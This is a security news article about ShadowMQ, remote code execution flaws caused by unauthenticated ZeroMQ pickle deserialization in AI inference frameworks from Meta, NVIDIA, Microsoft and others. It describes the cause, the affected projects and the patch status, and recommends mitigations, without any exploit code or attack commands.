Critical RCE Vulnerabilities Discovered in Major AI Frameworks by Meta, NVIDIA, and Microsoft

Critical RCE Vulnerabilities in AI Inference Engines Expose Major Frameworks

As artificial intelligence (AI) continues to revolutionize industries, the security of its underlying infrastructure has become paramount. Recent findings by Oligo Security have unveiled a series of critical Remote Code Execution (RCE) vulnerabilities, collectively termed ShadowMQ, affecting prominent AI frameworks developed by Meta, NVIDIA, Microsoft, and PyTorch projects, including vLLM and SGLang.

The Genesis of ShadowMQ

The vulnerabilities originate from the unsafe implementation of ZeroMQ (ZMQ) communications combined with Python’s pickle deserialization. ZMQ is a high-performance messaging library used extensively in AI frameworks for inter-process communication. However, when improperly configured, it can become a conduit for malicious code execution.

The issue first came to light in 2024 during an analysis of Meta’s Llama Stack. Researchers discovered that the framework utilized ZMQ’s `recv_pyobj()` method, which deserializes data using Python’s pickle module. This method, when used without proper authentication and validation, allows unauthenticated network sockets to execute arbitrary code during deserialization, providing a potential entry point for remote attackers.

Proliferation Across AI Frameworks

Following the identification of this vulnerability in Meta’s Llama Stack (CVE-2024-50050), Oligo Security extended their investigation to other AI frameworks. Alarmingly, they found that the same insecure pattern had propagated across multiple platforms:

– vLLM: An open-source library for efficient LLM inference, found to have similar vulnerabilities.

– NVIDIA’s TensorRT-LLM: A high-performance deep learning inference library, also affected.

– Modular’s Max Server: A server designed for AI model deployment, containing the same flaws.

– Microsoft’s Sarathi-Serve: An AI serving platform, identified with the vulnerability.

– SGLang: A framework used by major tech companies, also compromised.

The widespread nature of this vulnerability is attributed to code reuse and copy-paste development practices. Oligo’s code analysis revealed that entire files containing the flawed implementation were copied between projects, effectively spreading the security flaw across the AI ecosystem.

Potential Impact

The implications of these vulnerabilities are profound. AI inference servers are integral to enterprise infrastructure, processing sensitive data across GPU clusters. Successful exploitation could allow attackers to:

– Execute Arbitrary Code: Run malicious commands on the affected systems.

– Escalate Privileges: Gain higher-level access within the system.

– Exfiltrate Model Data: Steal proprietary AI models and associated data.

– Deploy Malware: Install cryptocurrency miners or other malicious software.

Organizations utilizing these frameworks include industry giants such as xAI, AMD, NVIDIA, Intel, LinkedIn, Oracle Cloud, Google Cloud, Microsoft Azure, AWS, MIT, Stanford, and UC Berkeley. The potential for widespread disruption underscores the critical nature of these vulnerabilities.

Current Status and Recommendations

While Meta has patched the vulnerability in their Llama Stack, other frameworks remain at risk. Microsoft’s Sarathi-Serve and SGLang, in particular, have either incomplete fixes or remain unpatched.

To mitigate the risks associated with ShadowMQ, organizations are advised to:

1. Update to Patched Versions: Ensure all AI frameworks are updated to versions that have addressed these vulnerabilities.

2. Avoid Untrusted Deserialization: Refrain from using Python’s pickle module with untrusted data sources.

3. Implement Authentication: Configure ZMQ communications to require authentication, preventing unauthorized access.

4. Restrict Network Access: Limit exposure by restricting network access to ZMQ endpoints, reducing the attack surface.

The discovery of ShadowMQ serves as a stark reminder of the importance of secure coding practices and thorough security audits, especially in the rapidly evolving field of artificial intelligence.